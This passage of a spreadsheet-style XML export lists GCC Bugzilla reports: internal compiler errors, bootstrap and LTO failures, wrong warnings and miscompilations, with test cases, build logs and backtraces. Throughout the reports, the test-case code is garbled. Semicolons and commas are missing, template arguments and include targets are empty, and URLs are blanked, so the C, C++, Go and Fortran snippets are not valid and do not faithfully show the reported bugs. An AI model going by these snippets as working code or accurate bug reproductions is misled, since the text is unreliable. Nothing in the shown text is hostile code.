    struct fgsl_interp D.1347
    static integer(kind=4) C.1345 = 1
    D.1347 = fgsl_interp_alloc (
    interp = fgsl_interp_alloc (
  }
}
module m
  use iso_c_binding
  type :: fgsl_interp
     type(c_ptr) :: gsl_interp
  end type fgsl_interp
contains
  function fgsl_interp_alloc(size)
    integer intent(in) :: size
    type(fgsl_interp) :: fgsl_interp_alloc
    logical :: double = .false.
    if (double) call abort()
    double = .true.
    fgsl_interp_alloc%gsl_interp = c_null_ptr
  end function fgsl_interp_alloc
end module m
use m
type(fgsl_interp) :: interp
interp = fgsl_interp_alloc(1)
end</t>
  </si>
  <si>
    <t>GCC-50758</t>
  </si>
  <si>
    <t>[4.7 Regression] Bootstrap fails at stage 2 on x86_64-apple-darwin10: error: variable 'token_no' set but not used</t>
  </si>
  <si>
    <t>At revision 180087 bootstrap fails at stage 2 on x86_64-apple-darwin10:
/opt/gcc/build_w/./prev-gcc/g++ -B/opt/gcc/build_w/./prev-gcc/ -B/opt/gcc/gcc4.7w/x86_64-apple-darwin10.8.0/bin/ -nostdinc++ -B/opt/gcc/build_w/prev-x86_64-apple-darwin10.8.0/libstdc++-v3/src/.libs -B/opt/gcc/build_w/prev-x86_64-apple-darwin10.8.0/libstdc++-v3/libsupc++/.libs -I/opt/gcc/build_w/prev-x86_64-apple-darwin10.8.0/libstdc++-v3/include/x86_64-apple-darwin10.8.0 -I/opt/gcc/build_w/prev-x86_64-apple-darwin10.8.0/libstdc++-v3/include -I/opt/gcc/work/libstdc++-v3/libsupc++ -L/opt/gcc/build_w/prev-x86_64-apple-darwin10.8.0/libstdc++-v3/src/.libs -L/opt/gcc/build_w/prev-x86_64-apple-darwin10.8.0/libstdc++-v3/libsupc++/.libs  -I../../work/libcpp -I. -I../../work/libcpp/../include -I../../work/libcpp/include -I/opt/sw64/include -g -O2 -mdynamic-no-pic -gtoggle -W -Wall -Wwrite-strings -Wmissing-format-attribute -pedantic -Wno-long-long -Werror -I../../work/libcpp -I. -I../../work/libcpp/../include -I../../work/libcpp/include -I/opt/sw64/include -c -o line-map.o -MT line-map.o -MMD -MP -MF .deps/line-map.Tpo ../../work/libcpp/line-map.c
../../work/libcpp/line-map.c: In function 'source_location linemap_macro_map_loc_to_exp_point(const line_map* source_location)':
../../work/libcpp/line-map.c:628:12: error: variable 'token_no' set but not used [-Werror=unused-but-set-variable]
cc1plus: all warnings being treated as errors
This code was introduced at revision 180081.
AFAIU the code the warning seems bogus.</t>
  </si>
  <si>
    <t>GCC-49029</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE in simplify_subreg at simplify-rtx.c:5266</t>
  </si>
  <si>
    <t>$ cat ~/ice.i
#pragma pack(1)
struct S0
{
  volatile unsigned f0:11
  signed f2:30
}
struct S1
{
  volatile struct S0 f7
}
struct S1 a b
void
bar ()
{
  foo (a.f7.f0) 
}
$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: arm-unknown-linux-gnueabi
Configured with: ../configure --target=arm-unknown-linux-gnueabi --prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi --with-sysroot=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi//sys-root --disable-multilib --with-local-prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sys-root --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-c99 --enable-long-long --enable-target-optspace target_alias=arm-unknown-linux-gnueabi --enable-languages=c++ --disable-shared --disable-libmudflap --disable-libssp
Thread model: posix
gcc version 4.7.0 20110517 (experimental) [trunk revision 173832] (GCC) 
$ ./xgcc -B. ~/ice.i
/home/ryan/ice.i: In function 'bar':
/home/ryan/ice.i:19:29: internal compiler error: in simplify_subreg at simplify-rtx.c:5266
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-20103</t>
  </si>
  <si>
    <t>[4.1 regression] ICE in create_tmp_var with C99 style struct initializer</t>
  </si>
  <si>
    <t>GNU C++ version 4.0.0 20050219 (experimental) (alphaev68-unknown-linux-gnu)
bug.cc: In function 'void g()':
bug.cc:28: internal compiler error: in create_tmp_var at gimplify.c:368
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Works fine with 3.4. No options required.</t>
  </si>
  <si>
    <t>GCC-13821</t>
  </si>
  <si>
    <t>[4.0 Regression] IRIX 6.5 bootstrap failure: ICE in simplify_gen_subreg</t>
  </si>
  <si>
    <t>Bootstrapping current mainline on mips-sgi-irix6.5 fails:
$ ./xgcc -B./ -B/.vol/gcc/share/mips-sgi-irix6.5/bin/ -isystem /.vol/gcc/share/mips-sgi-irix6.5/include -isystem /.vol/gcc/share/mips-sgi-irix6.5/sys-include -L/.vol/gcc/obj/gcc-3.5.0-20040122/6.5-gcc-java/gcc/../ld -O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I/.vol/gcc/src/gcc-dist/gcc -I/.vol/gcc/src/gcc-dist/gcc/. -I/.vol/gcc/src/gcc-dist/gcc/../include  -mabi=64 -fexceptions -c /.vol/gcc/src/gcc-dist/gcc/unwind-dw2-fde.c -o libgcc/mabi=64/unwind-dw2-fde.o -v -save-temps
Reading specs from ./specs
Configured with: /.vol/gcc/src/gcc-dist/configure --prefix=/.vol/gcc --with-local-prefix=/.vol/gcc --disable-nls --enable-libgcj
Thread model: single
gcc version 3.5.0 20040122 (experimental)
 ./cc1 -E -quiet -v -I. -I. -I/.vol/gcc/src/gcc-dist/gcc -I/.vol/gcc/src/gcc-dist/gcc/. -I/.vol/gcc/src/gcc-dist/gcc/../include -iprefix /.vol/gcc/obj/gcc-3.5.0-20040122/6.5-gcc-java/gcc/../lib/gcc/mips-sgi-irix6.5/3.5.0/ -isystem ./include -isystem /.vol/gcc/share/mips-sgi-irix6.5/bin/include -DIN_GCC -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -isystem /.vol/gcc/share/mips-sgi-irix6.5/include -isystem /.vol/gcc/share/mips-sgi-irix6.5/sys-include -isystem ./include /.vol/gcc/src/gcc-dist/gcc/unwind-dw2-fde.c -mabi=64 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -fexceptions -fworking-directory -O2 -o unwind-dw2-fde.i
ignoring nonexistent directory /.vol/gcc/share/mips-sgi-irix6.5/bin/include
ignoring nonexistent directory /.vol/gcc/share/mips-sgi-irix6.5/include
ignoring nonexistent directory /.vol/gcc/share/mips-sgi-irix6.5/sys-include
ignoring duplicate directory ./include
ignoring nonexistent directory /.vol/gcc/obj/gcc-3.5.0-20040122/6.5-gcc-java/gcc/../lib/gcc/mips-sgi-irix6.5/3.5.0/include
ignoring nonexistent directory /.vol/gcc/include
ignoring nonexistent directory /.vol/gcc/lib/gcc/mips-sgi-irix6.5/3.5.0/include
ignoring nonexistent directory /.vol/gcc/share/mips-sgi-irix6.5/include
ignoring duplicate directory .
ignoring duplicate directory /.vol/gcc/src/gcc-dist/gcc/.
#include ... search starts here:
#include  search starts here:
 .
 /.vol/gcc/src/gcc-dist/gcc
 /.vol/gcc/src/gcc-dist/gcc/../include
 ./include
 /usr/include
End of search list.
 ./cc1 -fpreprocessed unwind-dw2-fde.i -quiet -dumpbase unwind-dw2-fde.c -mabi=64 -auxbase-strip libgcc/mabi=64/unwind-dw2-fde.o -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -version -fexceptions -o unwind-dw2-fde.s
GNU C version 3.5.0 20040122 (experimental) (mips-sgi-irix6.5)
	compiled by GNU C version 3.4 20031030 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
/.vol/gcc/src/gcc-dist/gcc/unwind-dw2-fde.c: In function `search_object':
/.vol/gcc/src/gcc-dist/gcc/unwind-dw2-fde.c:968: internal compiler error: in simplify_gen_subreg at simplify-rtx.c:3442
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The ICE vanishes at -O1.
Here's the stack trace:
Breakpoint 1 fancy_abort (
    file=0x10667468 /.vol/gcc/src/gcc-dist/gcc/simplify-rtx.c line=3442 
    function=0x10667da0 simplify_gen_subreg)
    at /.vol/gcc/src/gcc-dist/gcc/diagnostic.c:584
(gdb) where
#0  fancy_abort (file=0x10667468 /.vol/gcc/src/gcc-dist/gcc/simplify-rtx.c 
    line=3442 function=0x10667da0 simplify_gen_subreg)
    at /.vol/gcc/src/gcc-dist/gcc/diagnostic.c:584
#1  0x103df8b4 in simplify_gen_subreg (outermode=QImode op=0x43ba040 
    innermode=SImode byte=7) at /.vol/gcc/src/gcc-dist/gcc/simplify-rtx.c:3442
#2  0x103df640 in simplify_subreg (outermode=QImode op=0x43b6ad0 
    innermode=DImode byte=7) at /.vol/gcc/src/gcc-dist/gcc/simplify-rtx.c:3407
#3  0x1043e530 in combine_simplify_rtx (x=0x43b6c90 op0_mode=DImode last=0 
    in_dest=0) at /.vol/gcc/src/gcc-dist/gcc/combine.c:3827
#4  0x1043d2f8 in subst (x=0x43b6c90 from=0x43ba940 to=0x43b6ad0 in_dest=0 
    unique_copy=0) at /.vol/gcc/src/gcc-dist/gcc/combine.c:3513
#5  0x1043d08c in subst (x=0x43b6ca0 from=0x43ba940 to=0x43b6ad0 in_dest=0 
    unique_copy=0) at /.vol/gcc/src/gcc-dist/gcc/combine.c:3462
#6  0x1043d08c in subst (x=0x43b6cb0 from=0x43ba940 to=0x43b6ad0 in_dest=0 
    unique_copy=0) at /.vol/gcc/src/gcc-dist/gcc/combine.c:3462
#7  0x104372dc in try_combine (i3=0x43c0090 i2=0x43bfde0 i1=0x0 
    new_direct_jump_p=0x7ffb7bbc) at /.vol/gcc/src/gcc-dist/gcc/combine.c:1909
#8  0x10433798 in combine_instructions (f=0x437ba80 nregs=705)
    at /.vol/gcc/src/gcc-dist/gcc/combine.c:629
#9  0x10145a00 in rest_of_handle_combine (decl=0x41fc400 insns=0x437ba80)
    at /.vol/gcc/src/gcc-dist/gcc/toplev.c:2781
#10 0x1014741c in rest_of_compilation (decl=0x41fc400)
    at /.vol/gcc/src/gcc-dist/gcc/toplev.c:3354
#11 0x1050f1a8 in tree_rest_of_compilation (fndecl=0x41fc400 nested_p=false)
    at /.vol/gcc/src/gcc-dist/gcc/tree-optimize.c:168
#12 0x1007ca54 in c_expand_body_1 (fndecl=0x41fc400 nested_p=0)
    at /.vol/gcc/src/gcc-dist/gcc/c-decl.c:6124
#13 0x1007ce4c in c_expand_body (fndecl=0x41fc400)
    at /.vol/gcc/src/gcc-dist/gcc/c-decl.c:6156
#14 0x105a88ec in cgraph_expand_function (node=0x41fc880)
    at /.vol/gcc/src/gcc-dist/gcc/cgraphunit.c:527
#15 0x105ac25c in cgraph_expand_all_functions ()
    at /.vol/gcc/src/gcc-dist/gcc/cgraphunit.c:1531
#16 0x105ac5c4 in cgraph_optimize ()
    at /.vol/gcc/src/gcc-dist/gcc/cgraphunit.c:1596
#17 0x100f67c0 in c_objc_common_finish_file ()
    at /.vol/gcc/src/gcc-dist/gcc/c-objc-common.c:245
#18 0x10048978 in finish_file () at /.vol/gcc/src/gcc-dist/gcc/c-lang.c:185
#19 0x100df338 in c_common_parse_file (set_yydebug=0)
    at /.vol/gcc/src/gcc-dist/gcc/c-opts.c:1222
#20 0x10142af4 in compile_file () at /.vol/gcc/src/gcc-dist/gcc/toplev.c:1806
#21 0x1014a860 in do_compile () at /.vol/gcc/src/gcc-dist/gcc/toplev.c:4628
#22 0x1014a984 in toplev_main (argc=21 argv=0x7ffb7f04)
    at /.vol/gcc/src/gcc-dist/gcc/toplev.c:4668
#23 0x100fb190 in main (argc=21 argv=0x7ffb7f04)
    at /.vol/gcc/src/gcc-dist/gcc/main.c:35
This looks similar to a Solaris 8/SPARC bootstrap failure (which hasn't yet
made it into bugzilla).
Environment:
System: IRIX64 columba 6.5 10120104 IP27
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: /.vol/gcc/src/gcc-dist/configure --prefix=/.vol/gcc --with-local-prefix=/.vol/gcc --disable-nls --enable-libgcj
How-To-Repeat:
Bootstrap mainline as above.</t>
  </si>
  <si>
    <t>GCC-23404</t>
  </si>
  <si>
    <t>gij trashes args of functions with more than 8 fp args</t>
  </si>
  <si>
    <t>This is on a Fedora Core 4 machine:
gij (GNU libgcj) version 4.0.1 20050727 (Red Hat 4.0.1-5)
The to be attached code does not run properly on ppc.  Runs fine on x86 (32 and
64 bit).  The byte-code appears to be correct because it runs fine using the IBM
JVM.
Compiled with:
javac plplot/*/*.java
Run with:
java plplot.examples.x08
The output is the arguments passed to plw3d().  In the source this is:
pls.w3d( 1.0 1.0 1.0 -1.5 1.5 -0.5 1.5 zmin zmax
                           alt[k] az[k] )
Output (first loop) is:
0.0
1.0
1.0
-1.5
1.5
-0.5
1.5
-5.093869927024149
NaN
-3.7431896459052014E-274
5.32506451E-315
Correct output should be:
1.0
1.0
1.0
-1.5
1.5
-0.5
1.5
-5.093869927024149
6.636602508481567
60.0
30.0
It looks like arg1 arg9 arg10 and arg11 are not passed properly.</t>
  </si>
  <si>
    <t>GCC-61248</t>
  </si>
  <si>
    <t>gccgo: spurious error: too many arguments [GoSmith]</t>
  </si>
  <si>
    <t>gcc version 4.10.0 20140516 (experimental) (GCC)
Program:
package main
func main() {
	var f func(int interface{})
	go f(0 recover())
}
$ go build -compiler=gccgo args.go 
args.go:5:10: error: too many arguments
  go f(0 recover())</t>
  </si>
  <si>
    <t>GCC-56509</t>
  </si>
  <si>
    <t>[4.8 regression] gnattools build failure</t>
  </si>
  <si>
    <t>../../xgcc -B../../ -static-libgcc -I- -I../rts -I. -I/daten/gcc/gcc-20130302/gcc/ada -DIN_GCC  -O2 -g -W -Wall -static-libstdc++ -static-libgcc  -o ../../gnatmake b_gnatm.o a-except.o ali.o ali-util.o aspects.o s-casuti.o alloc.o atree.o binderr.o butil.o casing.o csets.o debug.o elists.o einfo.o errout.o erroutc.o errutil.o err_vars.o fmap.o fname.o fname-uf.o fname-sf.o gnatmake.o gnatvsn.o hostparm.o interfac.o i-c.o i-cstrin.o krunch.o lib.o make.o makeusg.o makeutl.o mlib.o mlib-fil.o mlib-prj.o mlib-tgt.o mlib-tgt-specific.o mlib-utl.o namet.o nlists.o opt.o osint.o osint-m.o output.o prj.o prj-attr.o prj-attr-pm.o prj-com.o prj-dect.o prj-env.o prj-conf.o prj-pp.o prj-err.o prj-ext.o prj-nmsc.o prj-pars.o prj-part.o prj-proc.o prj-strt.o prj-tree.o prj-util.o restrict.o rident.o s-exctab.o s-secsta.o s-stalib.o s-stoele.o scans.o scng.o sdefault.o sfn_scan.o s-purexc.o s-htable.o scil_ll.o sem_aux.o sinfo.o sinput.o sinput-c.o sinput-p.o snames.o stand.o stringt.o styleg.o stylesw.o system.o validsw.o switch.o switch-m.o table.o targparm.o tempdir.o tree_io.o types.o uintp.o uname.o urealp.o usage.o widechar.o  \
	    targext.o link.o ../../ggc-none.o ../../libcommon-target.a ../../libcommon.a ../../../libcpp/libcpp.a ../rts/libgnat.a   ../../../libbacktrace/.libs/libbacktrace.a ../../../libiberty/libiberty.a  
../../libcommon-target.a(opts.o): In function `vec_alloc':
/daten/gcc/gcc-20130302/Build/gcc/../../gcc/vec.h:1303: undefined reference to `operator new(unsigned int)'
collect2: error: ld returned 1 exit status
make[3]: *** [../../gnatmake] Error 1
make[3]: Leaving directory `/daten/gcc/gcc-20130302/Build/gcc/ada/tools'
make[2]: *** [gnattools-native] Error 2
make[2]: Leaving directory `/daten/gcc/gcc-20130302/Build/gnattools'
make[1]: *** [all-gnattools] Error 2</t>
  </si>
  <si>
    <t>GCC-31823</t>
  </si>
  <si>
    <t>[4.2 regression] COMPLEX not documented</t>
  </si>
  <si>
    <t>The COMPLEX intrinsic is not documented in 4.2.</t>
  </si>
  <si>
    <t>GCC-79651</t>
  </si>
  <si>
    <t>ICE on invalid c++ code in lambda_expr_this_capture in lambda.c:718</t>
  </si>
  <si>
    <t>Adopted from clang:
$ g++ /home/marxin/BIG/Programming/llvm-project/clang/test/SemaCXX/cxx1y-generic-lambdas-capturing.cpp -std=c++1z
...
/home/marxin/BIG/Programming/llvm-project/clang/test/SemaCXX/cxx1y-generic-lambdas-capturing.cpp:911:39: internal compiler error: in lambda_expr_this_capture at cp/lambda.c:720
   double (*fd)(double) = [](auto a) { f(a) return a }
                                       ^
0xafe402 lambda_expr_this_capture(tree_node* bool)
	../../gcc/cp/lambda.c:718
0xafee03 maybe_resolve_dummy(tree_node* bool)
	../../gcc/cp/lambda.c:827
0x82eba8 build_new_method_call_1
	../../gcc/cp/call.c:8624
0x8300e8 build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
	../../gcc/cp/call.c:8884
0x8e73e9 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:17297
0x8e2d48 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc/cp/pt.c:16419
0x8dd309 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc/cp/pt.c:15684
0x8dd1ee tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc/cp/pt.c:15670
0x8dee77 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc/cp/pt.c:15896
0x8dee77 tsubst_expr(tree_node* tree_node* int tree_node* bool)
	../../gcc/cp/pt.c:15896
0x900f20 instantiate_decl(tree_node* bool bool)
	../../gcc/cp/pt.c:22840
0x96c3a6 maybe_instantiate_decl
	../../gcc/cp/decl2.c:5012
0x96cc38 mark_used(tree_node* int)
	../../gcc/cp/decl2.c:5108
0x82cb20 build_over_call
	../../gcc/cp/call.c:8102
0x82fc2e build_new_method_call_1
	../../gcc/cp/call.c:8814
0x8300e8 build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
	../../gcc/cp/call.c:8884
0x8e73e9 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:17297
0x8d48dc tsubst(tree_node* tree_node* int tree_node*)
	../../gcc/cp/pt.c:14031
0x8d0407 tsubst_function_type
	../../gcc/cp/pt.c:13091
0x8d3c34 tsubst(tree_node* tree_node* int tree_node*)
	../../gcc/cp/pt.c:13859</t>
  </si>
  <si>
    <t>GCC-78908</t>
  </si>
  <si>
    <t>[6/7 Regression] template instantiation with bit-field type</t>
  </si>
  <si>
    <t>Created attachment 40406
lto_read_decls_reduce_ut.ii
lto1: internal compiler error: in lto_read_decls at lto/lto.c:1814 linking the attached file with gcc-6.3.0
Reproduce with:
g++-6.3.0 -std=c++14 -Wfatal-errors -w -flto=4 -fuse-linker-plugin -O2 -DNDEBUG  lto_read_decls_reduce_ut.ii -o lto_read_decls_reduce_ut.o
Output:
lto1: internal compiler error: in lto_read_decls at lto/lto.c:1814
0xccbb85 lto_read_decls
	../../gcc-6.3.0/gcc/lto/lto.c:1814
0xccbb85 lto_file_finalize(lto_file_decl_data* lto_file*) [clone .isra.106]
	../../gcc-6.3.0/gcc/lto/lto.c:2045
0xccbb85 lto_create_files_from_ids
	../../gcc-6.3.0/gcc/lto/lto.c:2055
0xccbb85 lto_file_read
	../../gcc-6.3.0/gcc/lto/lto.c:2096
0xccbb85 read_cgraph_and_symbols
	../../gcc-6.3.0/gcc/lto/lto.c:2806
0xcc784d lto_main()
	../../gcc-6.3.0/gcc/lto/lto.c:3310
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
lto-wrapper: fatal error: /home/cfrasch/local/bin/g++ returned 1 exit status
compilation terminated.
/usr/bin/ld: lto-wrapper failed
collect2: error: ld returned 1 exit status
Build configuration:
Using built-in specs.
COLLECT_GCC=/home/cfrasch/local/bin/g++
COLLECT_LTO_WRAPPER=/home/cfrasch/local/bin/../libexec/gcc/x86_64-linux-gnu/6.3.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../gcc-6.3.0/configure -v --enable-languages=cc++ --disable-multilib --with-build-config=bootstrap-lto --program-suffix=-6.3.0 --enable-shared --without-included-gettext --enable-threads=posix --enable-nls --enable-nls --enable-gnu-unique-object --with-system-zlib --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu --with-pkgversion=Thesys 6.3.0-1 ubuntu 14.04
Thread model: posix
gcc version 6.3.0 (Thesys) 
Thanks</t>
  </si>
  <si>
    <t>charles.frasch</t>
  </si>
  <si>
    <t>GCC-78589</t>
  </si>
  <si>
    <t>g++ prints  instead of a function name when warning in an OpenMP outlined function</t>
  </si>
  <si>
    <t>When compiling the following testcase:
$ cat t.c
void bar (void)
{
#pragma omp parallel
  {
    int *p
    *p = 345
  }
}
with the g++ front-end I get a bogus  function name in
the warning:
$ ~/gcc/trunk/inst/bin/g++ -fopenmp -c -Wall -O t.c
t.c: In function â€˜â€™:
t.c:6:8: warning: â€˜pâ€™ is used uninitialized in this function [-Wuninitialized]
     *p = 345
     ~~~^~~~~
t.c:5:10: note: â€˜pâ€™ was declared here
     int *p
The C front-end prints the function name as bar._omp_fn.0 which
might also be a bit cryptic for the user but most probably less so.</t>
  </si>
  <si>
    <t>GCC-42466</t>
  </si>
  <si>
    <t>Multiple instantiations of template constructor fail</t>
  </si>
  <si>
    <t>The test code:
template
struct A
{
    IntT val_
    A() : val_(X) {}
    A(IntT arg) : val_(arg) {}
    template
    A(const A&amp; other) : val_(other.val_) {}
}
int main(int argc char** argv)
{
    A a
    A b = a
    A c
    A d = c
    A e
    A f = e
}
fails to compile on gcc 4.3.2:
case.cpp: In function 'int main(int char**)':
case.cpp:19: error: conversion from 'A' to non-scalar type 'A' requested
case.cpp:22: error: conversion from 'A' to non-scalar type 'A' requested
The first conversion is OK but the other two conversions are being flagged as errors.  Even if I were to put the conversions in a different order the same results... first one is OK other two fail.</t>
  </si>
  <si>
    <t>apatterno</t>
  </si>
  <si>
    <t>GCC-3230</t>
  </si>
  <si>
    <t>False warning for 'returning reference to temporary'</t>
  </si>
  <si>
    <t>Gcc-3.0 generates an incorrect warning about returning a reference to a temporary when a ?: expression is used directly in a return statement. If another temporary is used no warning is given.
Release:
3.0 20010616 (prerelease)
Environment:
System: Linux odie.andypo.net 2.2.19-7.0.1smp #1 SMP Tue Apr 10 01:46:39 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3_0-branch/configure --prefix=/usr/local/gcc-3.0-i686-pc-linux-gnu --with-gnu-as --with-gnu-ld --enable-threads=posix --enable-version-specific-runtime-libs --enable-languages=c++java --with-dwarf2 --enable-long-long=yes --enable-shared
How-To-Repeat:
a.cc:
------------------------------------------------------------------------------
const int* bar()
const int&amp;
foo1()
{
        static int empty
        const int* x = bar()
        return (x ? *x : empty)
}
const int&amp;
foo2()
{
        static int empty
        const int* x = bar()
        const int
        return (r)
}
------------------------------------------------------------------------------
% /usr/local/gcc-3.0-i686-pc-linux-gnu/bin/g++ -c a.cc
a.cc: In function `const int&amp; foo1()':
a.cc:8: warning: returning reference to temporary
Whereas foo2() compiles successfully.
gcc-2.95.3 and egcs-1.1.2 do not give this warning.</t>
  </si>
  <si>
    <t>andrewp</t>
  </si>
  <si>
    <t>GCC-4055</t>
  </si>
  <si>
    <t>-I flag error</t>
  </si>
  <si>
    <t>Including -I/usr/include will exclude a search for header files in
/usr/include.
Release:
3.0
Environment:
Linux: distribution Suse 7.1 kernel 2.2.19
How-To-Repeat:
The following:
a.cc:
#include 
g++ -I/usr/include a.cc
will fail</t>
  </si>
  <si>
    <t>mike_yang</t>
  </si>
  <si>
    <t>GCC-49078</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 173939 failed LTO bootstrap with
bootstrap-profiled:
../../src-trunk/gcc/passes.c: In function 'execute_todo':
../../src-trunk/gcc/passes.c:1256:1: internal compiler error: in get_alias_set at alias.c:715
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[7]: *** [/tmp/ccHRu2Jd.ltrans0.ltrans.o] Error 1
lto-wrapper: make returned 2 exit status
/usr/local/x86_64-unknown-linux-gnu/bin/ld: lto-wrapper failed
collect2: error: ld returned 1 exit status
make[6]: *** [f951] Error 1
make[6]: *** Waiting for unfinished jobs....
...
Revision 173929 is OK.</t>
  </si>
  <si>
    <t>GCC-21781</t>
  </si>
  <si>
    <t>real.c incorrectly values zero with a large exponent</t>
  </si>
  <si>
    <t>The following snippet if compiled with -Wall complains about a missing return
statement indicating GCC is erroneously folding the comparison to false.
int foo(void) { if (.0e200000000 == 0 ) return 1 }</t>
  </si>
  <si>
    <t>GCC-48035</t>
  </si>
  <si>
    <t>[4.4 Regression] Mismatch on size of class when initializing hierarchy involving virtual inheritance and empty base classes</t>
  </si>
  <si>
    <t>Created attachment 23585
preprocessed source file
The attached preprocessed source file is a much-simplified version of a more complex class hierarchy involving several levels of virtual inheritance and empty classes in the hierarchy.
g++ -v details:
Using built-in specs.
Target: i686-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-languages=cc++objcobj-c++javafortranada --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch=i686 --build=i686-redhat-linux
Thread model: posix
gcc version 4.4.5 20101112 (Red Hat 4.4.5-2) (GCC)
Also tested with a new build:
Using built-in specs.
COLLECT_GCC=./g++
Target: i686-pc-linux-gnu
Configured with: ./configure
Thread model: posix
gcc version 4.5.2 (GCC)
Among others.
Compile with g++ -c vtable-bug.i.
What we observe (tested on x86 and ARM) is that operator new is called to allocate 12 bytes for the class (and sizeof matches that 12 byte size) but the compiled code then proceeds to load four-byte 0's into offsets 0 4 8 AND 12 from the allocated buffer stomping data at byte offsets 12-15.  (More complex hierarchies can result in more than one 4-byte offset being stomped and/or the same offset being initialized repeatedly.)
Changing which classes are virtual or adding data to empty base classes changes or fixes the behavior.</t>
  </si>
  <si>
    <t>scot4spam</t>
  </si>
  <si>
    <t>GCC-34335</t>
  </si>
  <si>
    <t>[4.3 Regression] valid code rejected when reordering USE statements</t>
  </si>
  <si>
    <t>Consider the following piece of code:
module A
  type A_type
    real comp
  end type
end module A
module B
  use A
  private
  type(A_type) :: B_var
  public:: B_var
end module B
program C
  use B
  use A
  type(A_type):: A_var
end program C
This is rejected with the error message
  type(A_type):: A_var
             1
Error: Derived type 'a_type' at (1) is being used before it is defined
Please note that the error is only thrown under the condition that the USE statements in program C appear in the same order as shown above. When you exchange them and put use A first (or remove use B) then the error goes away. This makes me wonder if this bug is somehow related to PR33295.
Also the error only appears with the funny combination of PUBLIC and PRIVATE in module B. Admittedly it looks a little strange and is not very useful but nevertheless I think it's valid Fortran (someone correct me if I'm wrong).</t>
  </si>
  <si>
    <t>GCC-9179</t>
  </si>
  <si>
    <t>make modules: encode-gbk.o encode-gbk.c</t>
  </si>
  <si>
    <t>I executed make install and got the errors below. In the meantime I build a kernel without these modules so I can inform you only and do no tests.
make[3]: Entering directory 
`/usr/src/linux-2.4.19.SuSE/drivers/video/unicon'
make[3]: Circular /usr/src/linux-2.4.19.SuSE/include/asm/processor.h 
&lt;- /usr/src/linux-2.4.19.SuSE/include/linux/list.h dependency 
dropped.
gcc -D__KERNEL__ -I/usr/src/linux-2.4.19.SuSE/include  -Wall 
-Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing 
-fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 
-march=i686 -DMODULE -I.  -DKBUILD_BASENAME=xl_keyhooks  -c -o 
xl_keyhooks.o xl_keyhooks.c
gcc -D__KERNEL__ -I/usr/src/linux-2.4.19.SuSE/include  -Wall 
-Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing 
-fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 
-march=i686 -DMODULE -I.  -DKBUILD_BASENAME=xl_unikey  -c -o 
xl_unikey.o xl_unikey.c
gcc -D__KERNEL__ -I/usr/src/linux-2.4.19.SuSE/include  -Wall 
-Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing 
-fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 
-march=i686 -DMODULE -I.  -DKBUILD_BASENAME=xl_keymasks  -c -o 
xl_keymasks.o xl_keymasks.c
gcc -D__KERNEL__ -I/usr/src/linux-2.4.19.SuSE/include  -Wall 
-Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing 
-fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 
-march=i686 -DMODULE -I.  -DKBUILD_BASENAME=xl_hzfb  -c -o 
xl_hzfb.o xl_hzfb.c
gcc -D__KERNEL__ -I/usr/src/linux-2.4.19.SuSE/include  -Wall 
-Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing 
-fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 
